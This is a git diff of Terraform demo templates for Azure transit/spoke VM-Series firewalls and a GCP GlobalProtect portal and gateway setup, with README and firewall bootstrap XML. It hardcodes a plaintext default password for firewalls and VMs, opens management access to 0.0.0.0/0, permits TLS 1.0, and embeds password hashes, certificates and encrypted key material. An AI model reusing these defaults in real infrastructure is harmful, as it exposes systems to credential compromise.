+ protocol = "Tcp"
+ enable_floating_ip = false
+ subnet_id = module.spoke1_vnet.vnet_subnets[0]
+ private_ip_address = var.spoke1_internal_lb_ip
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM
+
+resource "azurerm_resource_group" "spoke2_rg" {
+ name = "${var.global_prefix}-${var.spoke2_prefix}-rg"
+ location = var.location
+}
+
+module "spoke2_vnet" {
+ source = "./modules/spoke_vnet/"
+ name = "${var.spoke2_prefix}-vnet"
+ address_space = var.spoke2_vnet_cidr
+ subnet_prefixes = var.spoke2_subnet_cidrs
+ remote_vnet_rg = azurerm_resource_group.transit.name
+ remote_vnet_name = module.vnet.vnet_name
+ remote_vnet_id = module.vnet.vnet_id
+ route_table_destinations = var.spoke_udrs
+ route_table_next_hop = [var.fw_internal_lb_ip]
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+ source = "./modules/spoke_vm/"
+ name = "${var.spoke2_prefix}-vm"
+ vm_count = var.spoke2_vm_count
+ subnet_id = module.spoke2_vnet.vnet_subnets[0]
+ availability_set_id = ""
+ publisher = "Canonical"
+ offer = "UbuntuServer"
+ sku = "16.04-LTS"
+ username = var.spoke_username
+ password = var.spoke_password
+ tags = var.tags
+ location = var.location
+ resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
new file mode 100644
index 00000000..3304b1e6
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license = "bundle1"
+#fw_license = "bundle2"
+
+global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription
+location = "centralus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group
+fw_count = 2
+fw_panos = "9.0.1"
+fw_nsg_prefix = "0.0.0.0/0"
+fw_username = "paloalto"
+fw_password = "Pal0Alt0@123"
+fw_internal_lb_ip = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr = "10.0.0.0/16"
+transit_subnet_names = ["mgmt", "untrust", "trust", "gateway"]
+transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count = 2
+spoke1_vnet_cidr = "10.1.0.0/16"
+spoke1_subnet_cidrs = ["10.1.0.0/24"]
+spoke1_internal_lb_ip = "10.1.0.100"
+
+spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count = 1
+spoke2_vnet_cidr = "10.2.0.0/16"
+spoke2_subnet_cidrs = ["10.2.0.0/24"]
+
+spoke_username = "paloalto"
+spoke_password = "Pal0Alt0@123"
+spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
diff --git a/azure/transit_2fw_2spoke_common_appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/variables.tf
@@ -0,0 +1,129 @@
+variable location {
+ description = "Enter a location"
+}
+
+variable fw_prefix {
+ description = "Prefix to add to all resources added in the firewall resource group"
+ default = ""
+}
+
+variable fw_license {
+ description = "VM-Series license: byol, bundle1, or bundle2"
+ # default = "byol"
+ # default = "bundle1"
+ # default = "bundle2"
+}
+
+variable global_prefix {
+ description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+ type = list(string)
+}
+
+variable transit_subnet_cidrs {
+ type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+ description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+ type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+ description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+ type = list(string)
+}
+
+variable tags {
+ description = "The tags to associate with newly created resources"
+ type = map(string)
+
+ default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+ description = "Azure client ID"
+ default = ""
+}
+
+variable client_secret {
+ description = "Azure client secret"
+ default = ""
+}
+
+variable subscription_id {
+ description = "Azure subscription ID"
+ default = ""
+}
+
+variable tenant_id {
+ description = "Azure tenant ID"
+ default = ""
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/Guide.pdf b/gcp/GP-NoAutoScaling/Guide.pdf
new file mode 100644
index 00000000..8b294c36
Binary files /dev/null and b/gcp/GP-NoAutoScaling/Guide.pdf differ
diff --git a/gcp/GP-NoAutoScaling/README.md b/gcp/GP-NoAutoScaling/README.md
new file mode 100644
index 00000000..e140aa27
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/README.md
@@ -0,0 +1,51 @@
+# GlobalProtect in GCP
+
+Terraform creates a basic GlobalProtect infrastructure consisting of 1 Portal and 2 Gateways (in separate Zones) along with two test Ubuntu servers.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/GP-NoAutoScaling/Guide.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequisites
+* Valid GCP Account with existing project
+* Access to GCP Cloud Shell or to a machine with Terraform 0.12 installed
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open GCP Cloud Shell and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/GP-NoAutoScaling
+```
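+
+Enabling the Compute Engine API can take a short while; you can confirm it is active before continuing:
+```
+$ gcloud services list --enabled | grep compute.googleapis.com
+```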
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Billing ID, Project Base Name, SSH Key (from step 1), and Region.
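+
+As a rough sketch only (every variable name here except GCP_Region is illustrative; keep the names already present in the file and substitute your own values):
+
+```
+billing_account = "XXXXXX-XXXXXX-XXXXXX"    # your Billing ID (illustrative variable name)
+project_name    = "gp-demo"                 # project base name (illustrative variable name)
+public_key      = "~/.ssh/gcp-demo.pub"     # SSH public key created in step 1 (illustrative variable name)
+GCP_Region      = "us-east1"                # deployment region
+```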
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build and remove the SSH key created in step 1.
+```
+$ terraform destroy
+$ rm ~/.ssh/gcp-demo*
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway.tf b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
new file mode 100644
index 00000000..d5249b81
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "gateway_bucket" {
+ name = "gateway-${random_id.random_number.hex}"
+ storage_class = "REGIONAL"
+ location = var.GCP_Region
+ project = google_project.globalprotect.number
+}
+resource "google_storage_bucket_object" "gateway_bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap-gateway/bootstrap.xml"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap-gateway/init-cfg.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_content" {
+ name = "content/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_software" {
+ name = "software/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_license" {
+ name = "license/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
new file mode 100644
index 00000000..6da28cec
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
@@ -0,0 +1,647 @@
+
+
+
+
+
+
+
+ yes
+
+
+ $1$afhulhyx$P9pkv4/MiYY070qlWmN.v0
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+ a0cb01b7
+ e8d8421e
+ Mar 24 17:02:26 2020 GMT
+ /CN=GP-CA
+ Mar 24 17:02:26 2021 GMT
+ dummy-gw-cert
+ 1616605346
+ no
+ /CN=dummy-gw-cert
+ -----BEGIN CERTIFICATE-----
+MIIDFDCCAfygAwIBAgIFAIsWwrMwDQYJKoZIhvcNAQELBQAwEDEOMAwGA1UEAxMF
+R1AtQ0EwHhcNMjAwMzI0MTcwMjI2WhcNMjEwMzI0MTcwMjI2WjAYMRYwFAYDVQQD
+Ew1kdW1teS1ndy1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
+stP0zbfGt7hagWFqN1AD8HsQC1MtPNJRif9TCdskkm15k4nNQmk17ynuXKQNolBB
+hoT+HyUN3AISxJ59QiEuwM0ZSta8PeYrgRSs1fFBWYx1o8Iel9uIGVt+wA81bgau
+fNa1xkKjEDf/9gUoIS/pshitwxzmdp9b5EAgP6AnMfvHQynITzE1hxB9vTh0V8kW
+glQ8H6s0PkxUaLoHmNhjj3Zwcg7FdiIgzJGOKK6fo/89Mc4BnqNLNqlvqzJC5meT
+hdiZFwn/8O9urfKFRp36ZUp+FDHSYIhATiW1MhyiAEfxvjtTeNT9nffhDTC+obJO
+lUSkc3fkuqnQ4pJH/29/LQIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQEAwID
+uDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkGA1Ud
+IwQCMAAwHQYDVR0OBBYEFD+qH0n0MvDc7amKUccXYBTXYMfMMA0GCSqGSIb3DQEB
+CwUAA4IBAQB3R44cMm/JqxiXoId8/7oFb9WfBrkBV77QXg9aDec34x4PjEYbRpDb
+9S+WFhWAG344MHluqsZuJF8PLtLSruNSfw4wxymMnHTKvn6yUT9o1Kseh/iRtFW4
+Oyog93g29rnqfVnJ1IslkgIdSB+LeW1wjOvIYcAfRQj0qFp4RK9esoJG4vvDTDI5
+BsmRqxR3aa9BY74wZMrnG5xby+Eyfo6RXzmjuR765yRO5HQSGQQhkKa+OhjkXrKA
+KlciqAIoD2NIusdlPUJtlyG0TKgq859+dICv2QTGxvT6YYt0eMR/85q/M1ydEiPd
+G4K6WWOKEwaJ5f9vyjCOTi42OJFzSOZq
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==upj09hPum45JJ00xXyKBB3Q5ZeY=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
+
+
+ e8d8421e
+ e8d8421e
+ Mar 24 17:00:47 2020 GMT
+ /CN=GP-CA
+ Mar 24 17:00:47 2021 GMT
+ GP-CA
+ 1616605247
+ yes
+ /CN=GP-CA
+ -----BEGIN CERTIFICATE-----
+MIICwDCCAaigAwIBAgIJAMn5gXdRd5x1MA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
+BAMTBUdQLUNBMB4XDTIwMDMyNDE3MDA0N1oXDTIxMDMyNDE3MDA0N1owEDEOMAwG
+A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBGFGm
+/Z+y3AcfqmxOn4RJwF7tA7bh1usgi7nZF5/JELLr0fSXvDqk41pT0Kzm3GWcdZ8b
+4kV1aLNfxWleozPGL4Ezl7z4xkc0kcntK3VpkK4+6/16hZBuQF9roqB0my1HlfRG
+eWBf7bye4ARqmiENuSC5YphS4KJOSoZ4h52hcSsXAcmD+FmtoOtckkvEl5TBhMQX
+Gt4N4FOsuUszQtbql6xNDAFmdXc4YajUVkUM3CRcMTRO+A2YbbRzvwUnGA3wueBb
+1C5JQGHd/lTzbEgTmeRDHvIyx8sruMOuYPQbg8d3JxGT6MZcXRCAJHCpWSXg3WZd
+vBoHuk/ZWNKqdMUPAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE
+MA0GCSqGSIb3DQEBCwUAA4IBAQB+eexIJn99kuJpWAVyh/W+pT1Ah52S8fQi/GJc
+DfxELZqsIg7VkkcZFZJ2aefQpoHp4avKyreUsAG6PnkR9DgNZVBJRe0PDxVf6C+T
+1HvE863NThiRUJi3l1GMaI+xQPKg83ceRsqOAqMzYtf/Xq+/XaawCcBei/9bGqpr
+AJHtvcgiO99yaQnu0hQ5K72Dn0v8ABbF6XyCSSuItdsaltS5XAlHp60+Mcq1R1eh
+n01P4VF6sz5Qsdu49743ja4rd68E/Vd+SQoSroZArOwjLE+dNItiPwgL217HQQqx
+6GgUahzsIr9nAQ59i6s3U4WY2bHZqL94GLdJfTq1dIyktMsz
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==Lw22pTLfVHUfvaPxm5QAxE/9jX4=wfL5Zc+wUAak+B7CnAVY6NdutYWtt67XvF+yGHFGS+v3hQ6NGerTNEn2/C/2TE21i7Y30DkK71PBtzbx6uj8HmXI7NZecoCmq/ifemD8h5NEiz8mIoh2ai3farhVRxqjU3RLHM9t2qD10XBXuyt/s8rqJUOAQnRQNFKPzQ1xnusR+7mg7ysVxXMIrxifWuJZfOQYHdeHPtP4PMwJmIBD5UD85Uaqo/qyoKdoDD55HTyInEndm690PMwCYOhUHrOz0FzWj67L++DH1ZUCW9L6VlkybcdA+IYevB2uoOPtxXkiSQ/XvyhZM8mo2B74M/lN+S17Pz85X5n2L/ddz+tMGwsDrcNK2thJsdw6CRrz2KoHoN7ypBCZU7zZTwPzOx559i1iTqaZcmprJivlUqi5D6yEd1znnoEWtxXrg+rnxHpjxNlwWIR/HuIPj4l8fnf7YtoqhGjz2FjGaCYBwif6iGXju/FSvAd0Vn0zCLOPoAvENRMQfZpjbg9UprVcbPusoxxCQ8w3y0gL4ioex8Wl8dqR2bf9Henf8CkzlrC9ZJNDWt/rbV5fv9ExbRNl9CD0zoex2/Fkth6KOA9dcFpXnmNgwymwhcjt/EQ3EYcAmGnnyTtotbiUUTptLzcomnPBkdVojD0CUrTseD6WirB5YUjmC/l2xADSoToABdMn0d5lqyfgcuzjQIlgV1sc5aE3sCQqoLa3rZCoXwDdCfLxsXo8wQQLJffqKBcQkMVMeyoAe3/wIaSO8p0aE7OOrRSVqfUwLZDqGhOMNZGjNjg4ke7gn6siwqwdQVkLyhRYkaUUd3K52/U5ldM2xv09va608AMgg+J8uAw/LBFqlB7GAQy2jLX+KF0OLhvOnDeJN2ljuJqovd+tOpnq+9KdPXYpcr+wSWTl2u/+dSPCUIn6I//czigZmxzjJiJf2Z5B1dduR5/kr92EdVZUY6/zZLW8Q1EyM7oDDDpUp56N9iqrQoQ4ebySO1IY2NsB4ClmH2coLDJ5Z4u1jsFmhOrw9oFUS17zcW6cw7MZIQovk/jCtapWN8B4NJDgnPMXJntJoHB3w4A7cGBh50uj8CAAS/Tm2B0noBj8mnYQOc9s/PgpI38sfFyYp5S6N8sZ68AfDKy7iLi/sHUlVYyYQunHknDWaOblejZlhWTA9tJ6/lpzl7p01BF7miMpqw77ZqMc4yV9ezzvNH2PE3jmO4POtexTsUXIIMMA7mj4MBzi5fNZ5T6M9XePFaVV60kr5JurD6qfUViPNthPigaKVhpimlF3MnQLUFFLITL3xClJ35cjCX25V94x30U4pN75Zb0EnqXd2h+1tmBg22zSKQBvl90knevLEFA4tDrJod3EfETZulp0eAD6VLXzV1B4rmatTCQYL//iKE2egQmQspfHASYtlK82ltUjnZ4Kbxju7KvbpOI8NPZEq+G3CfP29AggoeC1BD+KcrTWxv82B0Arwcv48+DMUBQYE8WQr+yI6BL9fhCA7aq6TyZW9WhVmovzLGu5x0uWRUa9GZw/Z4n+4ER/Fg79NhiAPryDwCYi/U7O0RzCMEwx1mfHaon50azUZTRJd8SCO1qBtkGGkaPFPfQVrpCX9S+COa+WVkeQ/vDMQjAPJqugn4h3W9o5IEXS4GVfmcttWWp9/5jMNws7u0P79guLAGgnBxUDGtQsqCJtYzEtOcF/wjxXS2RwejBZSi/YPp5dpl/mbTb2zQa7Q8w5gaE2hO2L8Wzs+L15HwmSro+/CfyiBRxzq0YxnRtLZL/eXguoQKQgOC2o6JjzTwuoQyAuJSXB08SdoEbaAYnEsLrowwOMT6djL4ATHgDRXLX6jDm78lmPtf/wQ1ZhR+41ZelV8HN3mCEz0VipzznFw18RklSf3krzRyz0XUziKEEnfdXU2JI4aiTIC4rsvNlGmSvlk2JE0uq6IE1BOobrpNZbnX6uzuCU/GqihknWafBsn1K9A//JFXZqVidSEHiFFgYs8JXqwk7Eo3mjL0+ldkI1rItzELohXCg5ibBtRjvkjWaG/pEaRjv6uZ1lAyc6RW9fNO30jEKuGyK0I7swl+dxpbeCtKXiGBsfZFcnIy8p+mdr+KoBp3i5/C8GWVyd5xaJZtS+9xD67rgDaIEhYS1fgTPtzwj62CHmR1ltaKts/Wdjk77JVn0pXcgQX8KWI9m4XZN4txygYxgIOij+pm6ekPi5wCuiemQ94fYYufj0viIlMjjxhEFi7j3TB2Ro
+
+
+
+
+
+ tls1-0
+ max
+
+ dummy-gw-cert
+
+
+
+
+
+
+
+
+ all
+
+
+
+
+
+
+ $1$dwadmvhu$fzo/POkYDQ/Z/IKyLtmlX.
+
+
+ $1$henwxpvq$KjL6f7B5gjVBDTEDT6pB6/
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+ ping
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ yes
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+
+ ethernet1/1
+ tunnel.1
+ ethernet1/2
+
+
+
+
+
+
+
+ ipv4
+ ethernet1/1
+
+
+
+
+ no
+
+
+ tunnel.1
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ FW-1
+ yes
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ FW-1
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ tunnel.1
+
+
+ yes
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+ untrust
+
+
+ tunnel-zone
+
+
+
+ any
+
+ any
+ no
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ trust
+
+
+ tunnel-zone
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ untrust
+
+
+ tunnel-zone
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+ yes
+ no
+
+
+
+ trust
+
+
+ tunnel-zone
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+
+
+
+
+ ethernet1/1
+ tunnel.1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+ 30
+
+
+ 3
+
+
+ 180
+
+
+
+
+
+ local
+ Any
+ Enter login credentials
+
+
+ gateway-ssl-tls
+ yes
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ 192.168.16.10-192.168.16.30
+
+
+ no
+ no
+
+
+ tunnel.1
+
+
+
+
+
+
+
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
